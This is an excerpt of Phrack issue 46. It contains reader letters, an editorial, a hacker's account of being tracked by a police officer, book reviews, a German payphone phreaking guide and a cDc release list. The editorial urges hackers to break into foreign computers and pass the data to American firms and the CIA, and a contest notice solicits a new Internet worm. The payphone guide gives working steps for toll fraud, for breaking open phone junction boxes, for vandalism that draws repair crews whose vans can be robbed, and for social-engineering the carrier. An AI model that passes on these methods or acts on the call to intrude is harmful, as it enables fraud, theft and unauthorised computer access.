[Thanks for the compliments...
About your question though, I'm not quite sure what you mean.
In a NetWare environment there really isn't any userlist and passwords
that you can get at. You can run the syscon utility and look at all the
usernames, but not much more. The passwords are stored in what's known
as the "bindery." These are 3 files in the sys/system directory
called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS. If you can
pull a password out of those files, I will shit in my hat and eat it.
Beyond that, yes, a key-capture program is definitely the ideal
solution for monitoring activity on a PC workstation. There is
one in this issue.]
I've Been reading your magazine for a long time now, my eyes light up when
I see an advert for a UK BBS with related hacking/phreaking articles or files
on it, but when I try to ring them they are usually gone.
I've been searching for ages for BBS's in the UK with these kind of articles
on them but I've had no luck, Even postings on the USENET had little results.
I have had a few boards which are shady but they ask unusual questions about
abiding to rules/laws about hacking then they prompt with fake login and
registration schemes.
If you have some, could you possibly send or publish a list of shady UK BBS's
Id be extremely grateful
Hell, I don't even know the numbers to any "shady" bulletin boards here
in America. The only UK hacker bbs I knew of in recent years was
Unauthorised Access, but I'm sure that's the advert you are referring to.
Maybe someone else in the UK knows something decent to call over there.
Any takers? ]
Many of you may remember the NSA Security Manual we published last
issue. That single file generated more press and hype than I'd
seen in a long time. It was mentioned in several newspapers, it
appeared on television. It was ridiculous. The document is
available to anyone who can fill out a FIOA request.
Regardless, people went zany. At first I couldn't figure out
why everyone was so worked up, and then I caught wind of Grady
Ward. Grady had posted the document to the net (with all mention
of Phrack deleted from it) in several USENET forums alt.politics.org.nsa,
talk.politics.crypto and comp.org.eff.talk. Several readers of
Phrack were quick to jump up and point out that Grady had obtained
it from the magazine (thanks guys!) which he grudgingly admitted.
Grady got to be in the spotlight for a while as the Phrack/NSA Handbook
thread continued to grow.
In the meantime, Grady was either calling, or giving him the
benefit of the doubt, getting called by an awful lot of press.
And even more compelling is the way he'd began pronouncing my
impending federal raid on so many newsgroups.
And of course, I don't have time to read any of that USENET crap
so I'm oblivious to all of this. Then I got a message from Grady.
You might want to get ready for the FBI
serving a warrant on you for information
about the NSA security employee manual
published in Phrack 45;
the NSA security people called me about 10 minutes
ago to talk about how it got on the net.
I being very cooperative, gave him
your address in Austin.
Get a grip.
Nothing that was contained in that file could not
be obtained through other sources.
Just because you did nothing illegal, doesn't mean that
you won't be annoyed by the FBI. Generally they will
be very polite however.
Gripping. Now what?
If someone actually did contact you, what was his name and number.
I will forward that to my lawyer.
I have received your mail regarding "Re: NSA"
It will be read immediately when I return.
If you are seeking more information on the
Moby lexical databases, please run
finger grady@netcom.com
for general information or help downloading
live samples and a postscript version of our
current brochure via anonymous ftp.
Thanks - Grady Ward
He never answered my mail.
Dear Sir:
Please refrain from sending such material to this address in the future!
Since this address has been usubscribed from the Phrack mailing list,
it means that further mailings are undesirable.
I would also wish to remind you that maintaining lists of people's email
without consent is quite immoral and devious. How hypocritical of
you, who decry all such behavior when it is practiced by corporations
or governments.
Thank you.
Dear Sir:
Please excuse the mailing. Have you ever heard of a mistake?
Have you ever heard of an oversight?
Is it really that much of an inconvenience for you to hit the "d" key
to remove one small piece of unwanted mail?
This being said, I would also like to invite you to go fuck yourself.
** I guess this guy does not like to get unsolicited mail **]
You people really piss me off! You're undermining the fun and
enjoyment of the rest of the internet users just for your juvenile
games and illegal activities. Do you realize how much better off we'd
be if you all just went away and left the Net to honest people like me?
There is no place in today's society for a bunch of maladjusted
paranoid psychotics like yourselves. Please do all of us users a favor
and go jump in a river.
Kevin Barnes
Hey Keith:
Thanks a lot for the letter!
You know, it does my heart good to hear from such kind and caring
folks like yourself. It's so fortunate for the Internet that there are
people like yourself who take it upon themselves to become martyrs for
their causes and express their ideals in such an intelligent manner.
It's fascinating to me that you can send such email sight-unseen.
Do you know who you are writing to? Do you even have the slightest
idea? What do you hope to accomplish? Do you have any idea?
This particular "maladjusted paranoid psychotic" to whom you have so
eloquently addressed is an engineer in the R&D of a Fortune 500 computer
company, and that along with outside consulting will net me about
six-figures this tax year. I've consulted for telephone companies,
governments, aerospace, financial institutions, oil companies (the list
goes on...) and quite frankly I don't do anything even remotely illegal.
In fact, one recent and quite prominent quote from me was "I only
hack for money."
Now, about the silent majority of "honest people" like yourself that you
have so self-rightously chosen to represent...
I've been using the net since the early 80's (arpa-days) initially
through a rms granted guest account on MIT-OZ. I've continued to
work with other Internet Providers to cover the asses of the so-called
"honest people" of which you include yourself.
Now, in my view, if it were not for people like us, who consistently
expose and pinpoint weaknesses in the operating systems and networking
technologies that you use for your "fun and enjoyment" and that I use
for MY JOB, you would continue to be at serious risk. But, perhaps
ignorance is truly bliss, and if so, then Keith, you are probably one of
the happiest people on this fine planet.
Now, per your request, I may just go jump in a river, as the one near
my house is quite nice, and it is almost 100 degrees here in Texas.
I only ask that you do me one small favor:
print out 500 copies of this letter, roll them up into a paper fist,
and shove them into any orifice on your person that meets your criteria
as deserving.
** I guess this guy doesn't like me...or you **
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 2a of 28
Phrack Editorial
If you aren't from America, this editorial really isn't meant for you,
so read on with warning, or go on to the next file.
Stupid hackers.
We've got to do something to clean up our image.
We truly are "America's Most Valuable Resource," as ex-CIA spook Robert
Steele has said so many times. But if we don't stop screwing over our own
countrymen, we will never be looked at as anything more than common
gutter trash. Hacking computers for the sole purpose of collecting
systems like space-age baseball cards is stupid, pointless and can only
lead to a quick trip up the river.
Obviously, no one is going to stop hacking. I've been lucky in that I've
found people willing to pay me to hack for them rather than against
them, but not everyone can score such a coup. What kind of alternative
can the rest of the community have?
Let's say that everyone was given an opportunity to hack without any
worry of prosecution with free access to a safe system to hack from,
with the only catch being that you could not hack certain systems.
Military, government, financial, commercial and university systems would
all still be fair game. Every operating system, every application, every
network type all open to your curious minds.
Would this be a good alternative? Could you follow a few simple
guidelines for the offer of virtually unlimited hacking with no worry of
governmental interference?
Where am I going with this?
Right now we are at war. You may not realize it, but we all feel the
implications of this war, because it's a war with no allies, and
enormous stakes. It's a war of economics.
The very countries that shake our hands over the conference tables of
NATO and the United Nations are picking our pockets. Whether it be the
blatant theft of American R&D by Japanese firms, or the clandestine and
governmentally-sanctioned bugging of Air France first-class seating, or
the cloak-and-dagger hacking of the SWIFT network by the German BND's
Project Rahab, America is getting fucked.
Every country on the planet is coming at us. Let's face it, we are the
leaders in everything. Period. Every important discovery in this
century has been by an American or by an American company. Certainly
other countries have better profited by our discoveries, but
nonetheless, we are the world's think-tank.
So, is it fair that we keep getting shafted by these so-called "allies?"
Is it fair that we sit idly by, like some old hound too lazy to scratch
at the ticks sucking out our life's blood by the gallon? Hell no.
Let's say that an enterprising group of computer hackers decided to
strike back. Using equipment bought legally, using network connections
obtained and paid for legally, and making sure that all usage was
tracked and paid for, this same group began a systematic attack of
foreign computers. Then, upon having gained access, gave any and all
information obtained to American corporations and the Federal
What laws would be broken? Federal Computer Crime Statutes specifically
target so-called "Federal Interest Computers." (ie: banks,
telecommunications, military, etc.) Since these attacks would involve
foreign systems, those statutes would not apply. If all calls and
network connections were promptly paid for, no toll-fraud or other
communications related laws would apply.
International law is so muddled that the chances of getting extradited
by a country like France for breaking into systems in Paris from Albuquerque
is slim at best. Even more slim when factoring in that the information
gained was given to the CIA and American corporations.
Every hacking case involving international breakins has been tried and
convicted based on other crimes. Although the media may spray headlines
like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA,"
those hackers were tried for breaking into systems within THEIR OWN
COUNTRIES...not somewhere else. 8lgm in England got press for hacking
world-wide, but got nailed hacking locally. Australia's Realm Hackers:
Phoenix, Electron & Nom hacked almost exclusively other countries, but
use of AT&T calling cards rather than Australian Telecom got them a charge
of defrauding the Australian government. Dutch hacker RGB got huge press
hacking a US military site and creating a "dquayle" account, but got
nailed while hacking a local university. The list goes on and on.
I asked several people about the workability of my proposal. Most
seemed to concur that it was highly unlikely that anyone would have to
fear any action by American law enforcement, or of extradition to
foreign soil to face charges there. The most likely form of retribution
would be eradication by agents of that government. (Can you say,
Well, I'm willing to take that chance, but only after I get further
information from as many different sources as I can. I'm not looking
for anyone to condone these actions, nor to finance them. I'm only
interested in any possible legal action that may interfere with my
I'm drafting a letter that will be sent to as many different people as
possible to gather a fully-formed opinion on the possible legal
ramifications of such an undertaking. The letter will be sent to the FBI,
SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress,
Armed Forces, members of local and state police forces, lawyers, professors,
security professionals, and anyone else I can think of. Their answers
will help fully form my decision, and perhaps if I pass along their
answers, will help influence other American hackers.
We must take the offensive, and attack the electronic borders of other
countries as vigorously as they attack us, if not more so. This is
indeed a war, and America must not lose.
->Erik Bloodaxe...Hacker...American.
Ok, so maybe that was a bit much. But any excuse to hack without fear
should be reason enough to exert a bit of Nationalism.
I'd much rather be taken out by the French in some covert operation and
go out a martyr, than catch AIDS after being raped by the Texas
Syndicate in the metal shop of some Federal Prison. Wouldn't you?
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 3 of 28
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Phrack Magazine is sponsoring a programming contest open to anyone
who wishes to enter.
Write the Next Internet Worm! Write the world's best X Windows wardialer!
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Other Comments:
The Grimmace
In PHRACK 43, I wrote an article on the life and times
of a computer cop operating out of the Jefferson County Police
Department in Louisville, Kentucky. In the article, I included
a transcript of a taped interview with him that I did after
socially engineering my way through the cop-bureaucracy in his
department. At the time I thought it was a hell of an idea and a
lot of PHRACK readers probably got a good insight into how the
"other side" thinks.
However, I made the terminal mistake of underestimating
the people I was dealing with by a LONG shot and felt that I
should write a short follow-up on what has transpired since that
article was published in PHRACK 43.
A lot of the stuff in the article about Lt. Baker was
obtained by an attorney I know who has no reason to be friendly
to the cops. He helped me get copies of court transcripts which
included tons of information on Baker's training and areas of
expertise. Since the article, the attorney has refused to talk
to me and, it appears, that he's been identified as the source
of assistance in the article and all he will say to me is that
"I don't want any more trouble from that guy...forget where you
left my phone number." Interesting...no elaboration...hang up.
As I recall, the PHRACK 43 issue came out around
November 17th. On November 20th, I received a telephone call
where I was living at the home of a friend of mine from Lt.
Baker who laughingly asked me if I needed any more information
for any "future articles". I tried the "I don't know what
you're talking about" scam at which time he read to me my full
name, date of birth, social security number, employer, license
number of my car, and the serial number from a bicycle I just
purchased the day before. I figured that he'd run a credit
history on me, but when I checked, there had been no inquiries
on my accounts for a year. He told me the last 3 jobs I'd held
and where I bought my groceries and recited a list of BBSs I was
on (two of which under aliases other than The Grimmace).
This guy had a way about him that made a chill run up my
spine and never once said the first threatening or abusive thing
to me. I suppose I figured that the cops were all idiots and
that I'd never hear anything more about the article and go on to
write some more about other computer cops using the same method.
I've now decided against it.
I got the message...and the message was "You aren't the
only one who can hack out information." I'd always expected to
get the typical "cop treatment" if I ever got caught doing
anything, but I think this was worse. Hell, I never know where
the guy's gonna show up next. I've received cryptic messages on
the IRC from a variety of accounts and servers all over the
country and on various "private" BBSs and got one on my birthday
on my Internet account...it traced back to an anonymous server
somewhere in the bowels of UCLA. I don't know anyone at UCLA
and the internet account I have is an anonymous account actually
owned by another friend of mine.
I think the point I'm trying to make is that all of us
have to be aware of how the cops think in order to protect
ourselves and the things we believe in. But...shaking the
hornet's nest in order to see what comes out maybe isn't the
coolest way to investigate.
Like I wrote in my previous article, we've all gotten a
big laugh from keystone cops like Foley and Golden, but things
may be changing. Local and federal agencies are beginning to
cooperate on a regular basis and international agencies are also
beginning to join the party.
The big push to eradicate child-pornography has led to a number of
hackers being caught in the search for the "dirty old men" on the Internet.
Baker was the Kentucky cop who was singularly responsible for the bust of the
big kiddie-porn FSP site at the University of Birmingham in England back
in April and got a lot of press coverage about it. But I had personally
never considered that a cop could hack his way into a password-protected
FSP site. And why would he care about something happening on the other
side of the world? Hackers do it, but not cops...unless the cops are
hackers. Hmmm...theories anyone?
I don't live in Louisville anymore...not because of
Baker, but because of some other problems, but I still look over
my shoulder. It would be easier if the guy was a prick, but I'm
more paranoid of the friendly good-ole boy than the raving
lunatic breaking in our front doors with a sledge hammer. I
always thought we were safe because we knew so much more than
the people chasing us. I'm not so certain of that anymore.
So that's it. I made the mistakes of 1) probably
embarrassing a guy who I thought would never be able to touch me
and 2), drawing attention to myself. A hacker's primary
protection lies in his anonymity...those who live the high
profiles are the ones who take the falls and, although I haven't
fallen yet, I keep having the feeling that I'm standing on the
edge and that I know the guy sneaking up behind me.
From the shadows--
The Grimmace
[HsL - RAt - UQQ]
"Cyberia" by Douglas Rushkoff
Review by Erik Bloodaxe
Imagine a book about drugs written by someone who never inhaled.
Imagine a book about raves written by someone saw a flyer once.
Imagine a book about computers by someone who someone who thinks
a macintosh is complex.
Imagine an author trying to make a quick buck by writing about something
his publisher said was hot and would sell.
And there you have Cyberia, by Douglas Rushkoff.
I have got to hand it to this amazing huckster Rushkoff, though. By
publishing Cyberia, and simultaneously putting out "The Gen X Reader,"
(which by the way is unequaled in its insipidness), he has covered all
bases for the idiot masses to devour at the local bookseller.
Rushkoff has taken it upon himself to coin new terms such as
"Cyberia," the electronic world we live in; "Cyberians," the people
who live and play online; etc...
Like we needed more buzzwords to add to a world full of "Infobahns"
"console cowboys," and "phrackers." Pardon me while I puke.
The "interviews" with various denizens of Rushkoff's "Cyberia" come off
as fake as if I were to attempt to publish an interview with Mao Tse Tung
in the next issue of Phrack.
We've got ravers talking on and on about "E" and having deep conversations
about smart drugs and quantum physics. Let's see: in the dozens of raves
I've been to in several states the deepest conversation that popped
up was "uh, do you have any more of that acid?" and "this mix is cool."
And these conversations were from the more eloquent of the nearly all under
21 crowd that the events attracted. Far from quantum physicians.
And beyond that, its been "ecstasy" or "X" in every drug culture I've wandered
through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street
in the early 80's with my fake id and bought a pouch of the magic elixir over
the counter from the bartender (complete with printed instructions).
NOT "E." But that's just nit-picking.
Now we have the psychedelic crowd. Listening to the "Interviews" of these
jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko.
"Some individuals who have smoked Mary Jane, or Reefer oftimes turn to
harder drugs such as LSD." That's not a quote from the book, but it may
as well be. People constantly talk about "LSD-this" and "LSD-that."
Hell, if someone walked into a room and went on about how he enjoyed his
last "LSD experience" the way these people do, you'd think they were
really really stupid, or just a cop. "Why no, we've never had any of
that acid stuff. Is it like LSD?" Please.
Then there are the DMT fruitcakes. Boys and girls, DMT isn't being sold
on the street corner in Boise. In fact, I think it would be easier for most
people to get a portable rocket launcher than DMT. Nevertheless, in every
fucking piece of tripe published about the "new psychedlicia" DMT is
splattered all over it. Just because Terrance Fucking McKenna
saw little pod people, does not mean it serves any high position
in the online community.
And Hackers? Oh fuck me gently with a chainsaw, Douglas. From Craig Neidorf's
hacker Epiphany while playing Adventure on his Atari VCS to Gail
Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik
was raided for the 3rd time. PLEASE! I'm sure Gail was up to her eyebrows
in bourbon, wearing a party hat and prank calling hackers saying "You're next,
my little pretty!" Not looking for 3rd-rate schlock journalists to whine to.
The Smart Drink Girl? The Mondo House? Gee...how Cyber. Thanks, but
no thanks.
I honestly don't know if Rushkoff really experienced any of this nonsense,
or if he actually stumbled on a few DMT crystals and smoked this
reality. Let's just say, I think Mr. Rushkoff was absent the day
his professor discussed "Creative License in Journalism" and just decided
to wing it.
Actually, maybe San Francisco really is like this. But NOWHERE else on
the planet can relate. And shit, if I wanted to read a GOOD San
Francisco book, I'd reread Armistead Maupin's "Tales of the City."
This book should have been called "Everything I Needed to Know About
Cyber-Culture I Learned in Mondo-2000."
Seriously...anyone who reads this book and finds anything remotely
close to the reality of the various scenes it weakly attempts to
cover needs to email me immediately. I have wiped my ass with
better pulp.
By Winn Schwartau
By Winn Schwartau. (C)opyright 1994 by the author
Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012
ISBN 1-56025-080-1 - Price $22.95
Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608
(800) 788-3123
Review by Scott Davis (dfox@fennec.com)
(from tjoauc1-4 ftp: freeside.com /pub/tjoauc)
If you only buy one book this year, make sure it is INFORMATION WARFARE!
In my 10+ years of existing in cyberspace and seeing people and organizations
debate, argue and contemplate security issues, laws, personal privacy,
and solutions to all of these issues...and more, never have I seen a more
definitive publication. In INFORMATION WARFARE, Winn Schwartau simply
draws the line on the debating. The information in this book is hard-core,
factual documentation that leaves no doubt in this reader's mind that
the world is in for a long, hard ride in regards to computer security.
The United States is open to the world's electronic terrorists.
When you finish reading this book, you will find out just how open we are.
Mr. Schwartau talks about industrial espionage, hacking, viruses,
eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs,
magnetic weaponry, and the newest phrase of our generation...
"Binary Schizophrenia". He exposes these topics from all angles. If you
spend any amount of time in Cyberspace, this book is for you.
How much do you depend on technology?
ATM machines, credit cards, toasters, VCR's, televisions, computers,
telephones, modems...the list goes on. You use technology and computers
and don't even know it! But the point is...just how safe are you from
invasion? How safe is our country's secrets? The fact is - they are NOT
SAFE! How easy is it for someone you don't know to track your every move
on a daily basis? VERY EASY! Are you a potential victim to fraud,
breech of privacy, or general infractions against the way you carry
on your daily activities? YES! ...and you'd never guess how vulnerable
we all are!
This book will take you deep into places the government refuses to
acknowledge. You should know about INFORMATION WARFARE. Order your
copy today, or pick it up at your favorite book store. You will not
regret it.
_Firewalls and Internet Security: Repelling the Wily Hacker_
William R. Cheswick
Steven M. Bellovin
Addison-Wesley, ISBN 0-201-63357-4
306 + XIV = 320 pages
(Printed on recycled paper)
Reviewed by Herd Beast
The back of this book claims that, "_Firewalls and Internet Security_
gives you invaluable advice and practical tools for protecting your
organization's computers from the very real threat of hacker attacks."
That is true. The authors also add something from their knowledge of
these hacker attacks. The book can be roughly separated into two
parts: Firewalls, and, you guessed it: Internet Security. That is
how I see it. The book itself is divided into four parts (Getting
Started, Building Your Own Firewall, A Look Back & Odds and Ends),
three appendixes, a bibliography, a list of 42 bombs and an index.
The book starts with overall explanations and an overview of the
TCP/IP protocol. More than an overview of the actual TCP/IP protocol,
it is a review of services often used with that protocol, and the
security risks they pose. In that chapter the authors define
"bombs" -- as particularly serious security risks. Despite that fact,
and the tempting bomb list in the end, this book is not a guide for
someone with passing knowledge of Internet security who wants to learn
more explicit details about holes. It is, in the authors' words, "not
a book on how to administer a system in a secure fashion."
FIREWALLS (Including the TCP/IP overview: pages 19-131)
What is a firewall and how is it built?(*) If you don't know that,
then definitely get this book. The Firewalls chapter is excellent
even for someone with a passing knowledge of firewalls or general
knowledge of what they set out to accomplish. You might still
learn more.
In the Firewalls chapter, the authors explain the firewall philosophy
and types of firewalls. Packet-filtering gateways rely on rule-based
packet filtering to protect the gateway from various types of attacks.
You can filter everything and achieve the same effect of disconnecting
from the Internet, you can filter everything from misbehaving sites,
you can allow only mail in, and so on. An application-level gateway
relies on the applications set on the firewall. Rather then let a
router filter traffic based on rules, one can strip a machine clean
and only run desired services -- and even then, more secure versions
of those services can be run. Circuit-level gateways relay data
between the gateway and other networks. The relay programs copy
data from inside the firewall to the outside, and log their activity.
Most firewalls on the Internet are a combination of these gateways.
Next, the authors explain how to build an application-level gateway
based on the work they have done with the research.att.com gateways.
As mentioned, this chapter is indeed very good. They go over setting
up the firewall machines, router configuration for basic packet
filtering (such as not allowing Internet packets that appear to come
from inside your network). They show, using the software on the
AT&T gateway as example, the general outline of proxies and give some
useful advise. That chapter is very interesting; reading it with Bill
Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes
it even better. The examples given, like the NFS and X proxies run on the
gateway, are also interesting by themselves.
INTERNET SECURITY (pages 133-237)
Internet security is a misleading name. This part might also be
called "Everything else." Most of it is a review of hacker attacks
logged by AT&T's gateway probes, and of their experience with a hacker.
But there is also a chapter dedicated to computer crime and the law --
computer crime statutes, log files as evidence, the legalities of
monitoring intruders and letting them keep their access after finding
them, and the ethics of many actions performed on the Internet; plus
an introduction to cryptography under Secure Communication over Insecure
Networks. The later sections are good. The explanation of several
encryption methods and short reviews of applications putting them to use
(PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the
computer crime sections are also good -- although I'm not a lawyer and
therefore cannot really comment on it, and notes that look like "5 USC
552a(b)(c)(10)" cause me to shudder. It's interesting to note that some
administrative functions as presented in this book, what the authors call
counter-intelligence (reverse fingers and rusers) and booby traps and fake
password file are open for ethical debate. Perhaps they are not illegal,
but counter-intelligence can surely ring the warning bells on the site being
counter-fingered if that site itself is security aware.
That said, let's move to hackers. I refer to these as "hacker studies",
or whatever, for lack of a better name. This is Part III (A Look
Back), which contains the methods of attacks (social engineering,
stealing passwords, etc), the Berferd incident (more on that later),
and an analysis (statistical and otherwise) of the Bell Labs gateway
Back to where we started, there is nothing new or innovative about
these chapters. The Berferd hacker case is not new, it is mostly just
uninteresting. The chapter is mostly a copy (they do state this) of
Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker
is Lured, Endured and Studied." The chapter concerning probes and
door-knob twisting on the Internet (Traps, Lures, and Honey Pots)
is mostly a copy (they do not state this) of Steven Bellovin's paper
titled, "There Be Dragons". What do we learn from the hacker-related
chapters? Let's take Berferd: The Sendmail DEBUG hole expert. After
mailing himself a password file and receiving it with a space after
the username, he tries to add accounts in a similar fashion. Cheswick
calls him "flexible". I might have chosen another F-word. Next are
the hacker logs. People finger. People tftp /etc/passwd. People try
to rlogin as bin. There are no advanced attacks in these sections.
Compared with the scary picture painted in the Firewalls chapter --
that of the Bad Guy spoofing hostnames, flooding DNS caches, faking
NFS packets and much more -- something must have gone wrong.(**)
Still, I cannot say that this information is totally useless. It is,
as mentioned, old. It is available and was available since 1992
on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***)
The bottom line is that this book is, in my opinion, foremost and upmost
a Firewaller's book. The hacker section could have been condensed
into Appendix D, a copy of the CERT advisory about computer attacks
("Don't use guest/guest. Don't leave root unpassworded.") It really
takes ignorance to believe that inexperienced hackers can learn "hacker
techniques" and become mean Internet break-in machines just by reading
_Firewalls and Internet Security_. Yes, even the chapter dedicated
to trying to attack your own machine to test your security (The Hacker's
Workbench) is largely theoretical. That is to say, it doesn't go above
comments like "attack NFS". The probes and source code supplied there are
for programs like IP subnet scanners and so on, and not for "high-level"
stuff like ICMP bombers or similar software; only the attacks are
mentioned, not to implementation. This is, by the way, quite
understandable and expected, but don't buy this book if you think it
will make you into some TCP/IP attacker wiz.
In summary:
The Firewalls part is excellent. The other parts not related to
hacker-tracking are good as well. The added bonuses -- in the form
of a useful index, a full bibliography (with pointers to FTP sites),
a TCP port list with interesting comments and a great (running out
of positive descriptions here) online resources list -- are also
grand (whew).
The hacker studies sections, based on old (circa 1992) papers, are
not interesting for anyone with any knowledge of hacking and/or
security who had some sort of encounters with hackers. People without
this knowledge might either get the idea that: (a) all hackers are
stupid and (b) all hackers are Berferd-style system formatters. Based on
the fact that the authors do not make a clear-cut statement about
hiring or not hiring hackers, they just say that you should think
if you trust them, and that they generally appear not to have a total
draconian attitude towards hackers in general, I don't think this was
THE UGLY (For the nitpickers)
There are some nasty little bugs in the book. They're not errors
in that sense of the word; they're just kind of annoying -- if you're
sensitive about things like being called a hacker or a cracker, they'll
annoy you. Try this: although they explain why they would use the term
"hacker" when referring to hackers (and not "eggsucker", or "cracker"),
they often use terms like "Those With Evil Intention". Or, comparing
_2600 Magazine_ to the Computer underground Digest.
(*) From the Firewalls FAQ :
``A firewall is any one of several ways of protecting one
network from another untrusted network. The actual mechanism
whereby this is accomplished varies widely, but in
principle, the firewall can be thought of as a pair of
mechanisms: one which exists to block traffic, and the other
which exists to permit traffic. Some firewalls place a
greater emphasis on blocking traffic, while others emphasize
permitting traffic.''
(**) This would be a great place to start a long and boring discussion
about different types of hackers and how security (including firewalls)
affect them. But... I don't think so.
(***) ftp://research.att.com:/dist/internet_security/firewall.book also
contains, in text and PostScript, the list of parts, chapters and
sections in the book, and the Preface section. For that reason,
those sections weren't printed here.
All the papers mentioned in this review can be found on that FTP
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Make the best out of your European pay telephone
by Onkel Dittmeyer, onkeld@ponton.hanse.de
Okay guys and girls, let's come to a topic old like the creation
but yet never revealed. European, or, to be more exact, German pay
phone technology. Huh-huh.
There are several models, round ones, rectangular ones, spiffy
looking ones, dull looking ones, and they all have one thing in
common: If they are something, they are not what the American reader
might think of a public pay telephone, unlike it's U.S. brothers,
the German payphones always operate off a regular customer-style
telephone line, and therefore they're basically all COCOTS, which
makes it a lot easier to screw around with them.
Let's get on with the models here. You are dealing with two
classes; coin-op ones and card-op ones. All of them are made by
Siemens and TELEKOM. The coin-op ones are currently in the process
of becoming extinct while being replaced by the new card-op's, and rather
dull. Lacking all comfort, they just have a regular 3x4 keypad,
and they emit a cuckoo tone if you receive a call. The only way to
tamper with these is pure physical violence, which is still easier
than in the U.S.; these babies are no fortresses at all. Well, while
the coin-op models just offer you the opportunity of ripping off
their money by physically forcing them open, there is a lot more
fun involved if you're dealing with the card babies. They are really
spiffy looking, and I mean extraordinary spiffy. Still nothing
compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line
pixel-oriented LCD readout displays the pure K-Radness of it's
inventors. Therefore it is equipped with a 4x4 keypad that has a lot
of (undocumented) features like switching the mother into touch-tone
mode, redial, display block etc. Plus, you can toggle the readout
between German, English, and French. There are rumors that you can
put it into Mandarin as well, but that has not been confirmed yet.
Let's get ahead. Since all payphones are operating on a regular
line, you can call them up. Most of them have a sign reading their
number, some don't. For those who don't, there is no way for you to
figure out their number, since they did not invent ANI yet over here
in the country famous for its good beer and yodel chants. Well, try
it. I know you thought about it. Call it collect. Dialing 010 will
drop you to a long-distance operator, just in case you didn't know.
He will connect the call, since there is no database with all the
payphone numbers, the payphone will ring, you pick up, the operator
will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh?
This would not be Phrack if there would be no way to screw it.
If you examine the hook switch on it closely, you will figure out
that, if you press it down real slow and carefully, there are two
levels at whom it provokes a function; the first will make the phone
hang up the line, the second one to reset itself. Let me make this
a little clearer in your mind.
----- <--- totally released
| <--- hang up line
press to this level --> |
| <--- reset
----- <--- totally hung up
Involves a little practice, though. Just try it. Dial a number
it will let you dial, like 0130, then it will just sit there and
wait for you to dial the rest of the number. Start pressing down
the hookswitch really slow till the line clicks away into suspense,
if you release it again it will return you to the dial tone and
you are now able to call numbers you aren't supposed to call, like
010 (if you don't have a card, don't have one, that's not graceful),
or 001-212-456-1111. Problem is, the moment the other party picks
up, the phone will receive a charge subtraction tone, which is a
16kHz buzz that will tell the payphone to rip the first charge unit,
30 pfennigs, off your card, and if you don't have one inserted and
the phone fails to collect it, it will go on and reset itself
disconnecting the line. Bad luck. Still good enough to harass your
favorite fellas for free, but not exactly what we're looking for,
right? Try this one. Push the hook lever to the suspension point,
and let it sit there for a while, you will have to release it a
bit every 5 seconds or so, or the phone will reset anyway. If you
receive a call while doing this, a buzz will appear on the line.
Upon that buzz, let the lever go and you'll be connected, and
the cuckoo tone will be shut up! So if you want to receive a collect
call, this is how you do it. Tell the operator you accept the charges,
and talk away. You can use this method overseas, too: Just tell your
buddy in the states to call Germany Direct (800-292-0049) and make
a collect call to you waiting in the payphone, and you save a cool
$1.17 a minute doing that. So much for the kids that just want to
have some cheap fun, and on with the rest.
Wasting so much time in that rotten payphone, you probably
noticed the little black box beneath the phone. During my, erm,
research I found out that this box contains some fuses, a standard
Euro 220V power connector, and a TAE-F standard phone connector.
Completing the fun is the fact that it's extremely easy to pry it
open. The TAE-F plug is also bypassing the phone and the charge
collection circuits, so you can just use it like your jack at home.
Bring a crowbar and your laptop, or your Pentium tower, power it over
the payphone and plug your Dual into the jack. This way you can even
run a board from a payphone, and people can download the latest
WaReZzzZzz right from the booth. It's preferable to obtain a key for
the lock of the box, just do some malicious damage to it (yes, let
the animal take control), and call Telekom Repairs at 1171 and they
will come and fix it. Since they always leave their cars unlocked,
or at least for the ones I ran across, you can either take the whole
car or all their k-rad equipment, manuals, keys, and even their lunch
box. But we're shooting off topic here. The keys are usually general
keys, means they fit on all payphones in your area. There should also
be a nationwide master key, but the German Minister of Tele-
communications is probably keeping that one in his desk drawer.
The chargecards for the card-op ones appear to have a little chip
on them, where each charge unit is being deducted, and since no-one
could figure out how it works, or how to refill the cards or make a
fake one, but a lot of German phreaks are busy trying to figure that
A good approach is also social-engineering Telekom so they turn
off the charge deduction signal (which doesn't mean the call are free,
but the buzz is just not transmitted any more) so the phone doesn't
receive a signal to charge you any money no matter where you call.
The problem with this method is that the world will spread in the
neighborhood that there is a payphone where you can call for free,
and therefore it will be so crowded that you can't use it, and
the phone pals will catch up fast. It's fun though, I tried it, and
I still get free drinks at the local pub for doing it.
Another k-rad feature on them is the built-in modem that they use
to get their software. On a fatal error condition they appear to dial
a telecom number and download the latest software just how their ROM
commands them to do. We will shortly take a phone, install it some-
where else and figure out where it calls, what the protocol is and
what else is being transmitted, but that will probably be in another
If you found out anything that might be of interest, you are
welcome to mail it to onkeld@ponton.hanse.de using the public key
beneath. Unencrypted mail will be killed since ponton.hanse.de is
run by a paranoid bitch that reads all traffic just for the hell
of it, and I don't want the phedzZz to come and beat me over the
head with a frozen chunk o' meat or worse.
Stay alert, watch out and have fun...
Version: 2.3a
_ _ _ _
[ x x ] [ x x ]
\ / cDc communications \ /
(' ') -cDc- CULT OF THE DEAD COW -cDc- (' ')
(U) (U)
deal with it, presents unto you 10 phat t-files, deal with it,
S U C K E R fresh for July 1994: S U C K E R
New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:
_________________________________/Text Files\_________________________________
261: "Interview with Greta Shred" by Reid Fleming. Reid conducts an in-depth
interview with the editor of the popular 'zine, _Mudflap_.
262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile. Paper
presented for the 1993 National Popular Culture Association meeting in New
263: "What Color Is the Sky in Your World?" by Tequila Willy. Here's your
homework, done right for you by T. "Super-Brain" Willy.
264: "Chicken Hawk" by Mark E. Dassad. Oh boy. Here's a new watermark low
